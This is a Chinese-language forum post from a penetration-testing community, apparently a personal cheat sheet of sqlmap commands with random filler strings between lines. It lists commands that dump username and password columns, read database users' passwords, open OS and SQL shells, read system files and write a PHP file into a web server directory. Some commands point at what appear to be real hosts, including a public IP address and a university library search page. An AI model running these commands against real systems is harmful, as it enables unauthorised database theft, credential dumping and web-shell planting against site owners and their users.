中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
% B6 o5 l) @+ I. p; ]6 V5 d$ w
1 l3 _7 ^9 ~% p) l8 J* t% A
update :::::> in the folder after execute following order : svn update
$ W5 g' W Z0 y$ M
* r- v3 {, g0 i# b; \1 i# V1 r5 }
sqlmap.py -r 1.txt --current-db
9 H; v! _) p8 Q
4 v# `1 [1 }0 u
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
$ r- c2 R0 ~/ N* I. T
# M& l5 C' Z" }3 c
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
" J3 u! O5 z f* J
猜解数据库
& l' E) a" Z( t8 S8 L
./sqlmap.py -u "injection-url" --dbs
3 C5 x* X& T5 M4 Q K" O& e
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
0 f: c9 Z5 m2 R' ]3 ?
+ d, \! F) W1 D& J" ?" h
猜解表名
. {: ~% z. b; J
./sqlmap.py -u "injection-url" -D database_name --tables
( Y# c1 }. X9 H% K- f
W |3 P+ n# A5 v8 u
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
. o/ \ ?( a j
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
- T& \* B* L$ y- s- {
9 [7 O1 o3 q5 ]# I
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
1 u6 R; [; f( ~
& _& m/ W! ^ Y; ?! R
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
. O3 x# h7 I/ |9 |+ x8 G" A
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
- n- N# @/ [$ J0 @
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
' }8 s$ |! _; l& Z# S5 o
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
/ Z$ w+ [5 P5 A: i; t7 Z+ v' |/ K
1 j+ N- m) N$ D: w
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
B2 ^: i+ B0 u9 N$ T
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
' j, H, `- Z+ X- i, _5 s2 ^3 M* D" e
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
9 T, V1 m& K0 k) M/ P
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
; S0 a H% `( Q1 @# J5 b
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
7 y" K; I& d. {, |
+ \4 h* o* g0 b4 [% D$ b+ T( k
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
7 A& C& J! J! y3 R% D
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
2 t4 m* O0 w% I% j7 e! [/ m: q
' o. g( t* b1 H* J
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
* k7 B: r+ Q8 @. s D
猜解列名
& x, E3 y* s8 r# ]* Y; B
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
P3 G0 ?% a! t9 U# J5 I9 O) ]
$ d, i. K! U7 g: A7 n, M
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
0 b3 Z+ v3 V& Y: ~7 Y
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
6 Q9 b' }3 c5 D. k/ W6 u" m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
1 x) w# g9 F$ `0 O% M x
9 x" b8 q* Z8 {9 `: Q
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
& n; y- B; S0 N1 V
&submit=Go
/ Z& j6 X5 A" B! c
猜解值
3 x1 U/ {5 H. I4 w: c5 }
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
& F4 C! f* K+ n3 o/ d
========================================================
1 l: v! x" P K' S! Q
搜索表名中包括mana字符的
! B3 J# t# j7 n/ p
/sqlmap.py -u "injection-url" -T mana --search
" Z1 a/ T. N. N2 U' e
返回一个交互式sql shell
# T( y6 W, L p% l! C: J. s
/sqlmap.py -u "injection-url" --sql-shell
; t* T; y+ `5 c. Y+ _" g5 L* c, g2 e
读取指定文件(需权限)
3 w0 Q) Q4 I4 g' ?! K
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
* i( u$ ~+ J7 L3 m# n6 Q
查看当前 用户 及 数据库
9 W) I9 G" @9 D7 @* g
/sqlmap.py -u "injection-url" --current-user --current-db
) Z- U/ A. X; Q& _/ i3 h; E
本地文件 写入 远程目标绝对路径
" [3 D( E( z$ v+ u/ P) u+ }
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
* X& C3 z8 u" J7 f* r: H$ c l8 ^
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
5 }8 D$ d0 m3 q% y; J
- q% {; u9 f E7 G6 O4 p
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
}3 l" O3 b) M( d
查看某用的权限
% h! S. W7 D6 S4 {8 \9 }
/sqlmap.py -u "injection-url" --privileges -U root
9 j0 i! s8 u- M1 \' x
查看当前用户是否为dba
1 q, C( }3 {6 f: M' Q$ m' |
/sqlmap.py -u "injection-url" --is-dba
" v2 v7 f% b$ s3 m8 w
读取所有数据库用户或指定数据库用户的密码
/ a7 T: \0 \; a% _, T% ?
sqlmap.py -r 1.txt --users --passwords
! {6 d: v! r7 N. h
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
1 ^. I4 s# `6 V( G* c
3 R( ?+ n5 X) y. `$ \+ r
/sqlmap.py -u "injection-url" --passwords -U root
6 n# J+ G; c3 Q5 K; Y
6 T4 C, ^/ d; `3 P
--start&&--stop 与 --first&&--last 的区别
$ B# ^# X4 L; {+ \
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
8 V7 ^5 [* f+ U: b) q: i" s7 {1 \
% Q9 W ^; {: a0 k
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
, [" Q8 V w0 w" o( l
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
, Y# [5 H; z2 l" P; U8 L
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
9 T1 }4 A( P$ m* }* S
; ]0 B+ P+ x, p
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
0 u+ ?2 ^& w1 Y: _3 s
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
" F1 z% ~- y9 S3 z7 f
4 p& ?: g. G3 L, }" E ^0 H
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2